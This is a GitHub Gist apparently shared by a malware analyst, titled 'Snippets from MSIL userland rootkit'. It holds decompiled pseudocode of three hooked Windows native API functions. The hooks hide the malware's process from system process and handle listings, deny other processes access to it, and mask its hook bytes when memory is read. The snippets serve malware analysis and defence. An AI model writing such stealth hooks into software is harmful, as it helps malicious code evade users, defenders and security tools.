-
-
Save hasherezade/40b45481b32dd6ed4c9240a8e1b33795 to your computer and use it in GitHub Desktop.
Snippets from MSIL userland rootkit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int __stdcall NtReadVirtualMemory_filter(int ProcessHandle, unsigned int BaseAddress, int Buffer, int NumberOfBytesToRead, int NumberOfBytesRead) | |
{ | |
int pid; // esi@2 | |
int v7; // [sp-14h] [bp-2Ch]@1 | |
int v8; // [sp-10h] [bp-28h]@1 | |
int v9; // [sp-Ch] [bp-24h]@1 | |
int v10; // [sp-8h] [bp-20h]@1 | |
int v11; // [sp-4h] [bp-1Ch]@1 | |
int v12; // [sp+0h] [bp-18h]@0 | |
int v13; // [sp+4h] [bp-14h]@0 | |
unsigned int j; // [sp+4h] [bp-14h]@9 | |
int v15; // [sp+8h] [bp-10h]@0 | |
int v16; // [sp+8h] [bp-10h]@9 | |
int v17; // [sp+Ch] [bp-Ch]@0 | |
unsigned int i; // [sp+Ch] [bp-Ch]@4 | |
int res; // [sp+10h] [bp-8h]@1 | |
res = ((int (__cdecl *)(int, unsigned int, int, int, int))((char *)&NtReadVirtualMemory_original))( | |
ProcessHandle, | |
BaseAddress, | |
Buffer, | |
NumberOfBytesToRead, | |
NumberOfBytesRead); | |
if ( res >= 0 ) | |
{ | |
pid = GetProcessId(ProcessHandle); | |
if ( pid == GetCurrentProcessId() || ProcessHandle == -1 ) | |
{ | |
for ( i = 0; i < 3; ++i ) | |
{ | |
if ( *(_DWORD *)((char *)&loc_7 + 4 * i + 5) | |
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) >= BaseAddress | |
&& *(_DWORD *)((char *)&loc_7 + 4 * i + 5) < NumberOfBytesToRead + BaseAddress ) | |
{ | |
v16 = *(_DWORD *)((char *)&loc_7 + 4 * i + 5) - BaseAddress; | |
for ( j = 0; j < 0x18; ++j ) | |
*(_BYTE *)(Buffer + v16 + j) = *((_BYTE *)&loc_2B + 24 * i + j - 19); | |
} | |
} | |
} | |
} | |
return res; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int __stdcall NtOpenProcess_filter(int ProcessHandle, int DesiredAccess, int ObjectAttributes, _DWORD *ClientId) | |
{ | |
int res; //result of the operation | |
if ( ClientId && *ClientId == *(_DWORD *)((char *)&malwareId + 3) ) | |
res = 0xC0000022; //STATUS_ACCESS_DENIED | |
else | |
res = ((int (__stdcall *)(int, int, int, _DWORD *))((char *)&NOpentProcess_original))( | |
ProcessHandle, | |
DesiredAccess, | |
ObjectAttributes, | |
ClientId); | |
return res; | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int __stdcall NtQuerySystemInformation_filter(int SystemInformationClass, unsigned int *SystemInformation, int SystemInformationLength, int ReturnLength) | |
{ | |
char *v4; // esi@18 | |
char *v5; // edi@18 | |
unsigned int j; // [sp+8h] [bp-1Ch]@16 | |
unsigned int i; // [sp+Ch] [bp-18h]@13 | |
int res; // [sp+10h] [bp-14h]@1 | |
unsigned int *sys_info_ptr; // [sp+18h] [bp-Ch]@3 | |
unsigned int *v11; // [sp+1Ch] [bp-8h]@5 | |
res = ((int (__stdcall *)(int, unsigned int *, int, int))NtQuerySystemInformation_original)( | |
SystemInformationClass, | |
SystemInformation, | |
SystemInformationLength, | |
ReturnLength); | |
if ( res >= 0 ) | |
{ | |
if ( SystemInformationClass == 5 ) //SystemProcessInformation | |
{ | |
sys_info_ptr = SystemInformation; | |
while ( *sys_info_ptr ) | |
{ | |
v11 = sys_info_ptr; | |
sys_info_ptr = (unsigned int *)((char *)sys_info_ptr + *sys_info_ptr); | |
if ( *(unsigned int *)((char *)sys_info_ptr + (_DWORD)&loc_56 - 18) == loc_8 ) | |
{ | |
if ( *sys_info_ptr ) | |
*v11 += *sys_info_ptr; | |
else | |
*v11 = 0; | |
sys_info_ptr = v11; | |
} | |
} | |
} | |
else if ( SystemInformationClass == 16 ) //SystemHandleInformation | |
{ | |
for ( i = 0; i < *SystemInformation; ++i ) | |
{ | |
if ( *(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) == loc_8 ) | |
{ | |
*((_BYTE *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 20) = 0; | |
*(_DWORD *)((char *)&loc_23 + (_DWORD)&SystemInformation[4 * i] - 19) = 0; | |
*(_WORD *)((char *)&loc_1D + (_DWORD)&SystemInformation[4 * i] - 19) = 0; | |
*(_DWORD *)((char *)&loc_20 + (_DWORD)&SystemInformation[4 * i] - 20) = 0; | |
*((_BYTE *)&loc_1A + (_DWORD)&SystemInformation[4 * i] - 18) = 0; | |
*(_DWORD *)((char *)&loc_15 + (_DWORD)&SystemInformation[4 * i] - 17) = 0; | |
for ( j = i; j < *SystemInformation; ++j ) | |
{ | |
v4 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * (j + 1)] - 17; | |
v5 = (char *)&loc_15 + (_DWORD)&SystemInformation[4 * j] - 17; | |
*(_DWORD *)v5 = *(_DWORD *)v4; | |
v4 += 4; | |
v5 += 4; | |
*(_DWORD *)v5 = *(_DWORD *)v4; | |
v4 += 4; | |
v5 += 4; | |
*(_DWORD *)v5 = *(_DWORD *)v4; | |
*((_DWORD *)v5 + 1) = *((_DWORD *)v4 + 1); | |
} | |
--*SystemInformation; | |
--i; | |
} | |
} | |
} | |
} | |
return res; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment